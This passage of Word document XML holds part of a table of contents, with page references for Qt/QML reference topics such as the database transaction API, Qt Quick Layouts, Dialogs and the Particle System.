          <w:instrText xml:space="preserve"> PAGEREF _Toc483605387 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>172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88" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>db.readTransaction(callback(tx))</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605388 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>173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89" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>results = tx.executeSql(statement, values)</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605389 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>173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90" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Method Documentation</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605390 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>174</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91" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Quick Layouts</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605391 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>175</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92" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Quick Layouts Overview</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605392 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>175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93" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Getting started</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605393 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>175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94" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Key Features</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605394 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>175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95" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Size Constraints</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605395 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>175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96" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Specifying Preferred Size</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605396 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>177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397" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Connecting windows and layouts</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605397 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>178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398" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:noProof/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>тыпы модуля</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605398 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>178</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399" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:kern w:val="36"/>
            <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
          </w:rPr>
          <w:t>Qt Quick Dialogs</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605399 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>180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00" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Types</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605400 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>180</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00385670" w:rsidRPr="00385670" w:rsidRDefault="00385670">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc483605401" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Quick Particles QML Types</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605401 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>184</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402" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Using the Qt Quick Particle System</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605402 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>185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03" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>The ParticleSystem</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605403 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>185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04" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Logical Particles</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605404 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>185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05" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Particle Groups</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605405 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>185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06" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Emitters</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605406 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>186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07" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ParticlePainters</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605407 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>186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08" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Affectors</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605408 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>186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09" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Stochastic Parameters</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605409 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>186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10" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Directions</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605410 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>187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11" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Shapes</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605411 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>187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12" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Particle System Performance Guide</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605412 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>187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13" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
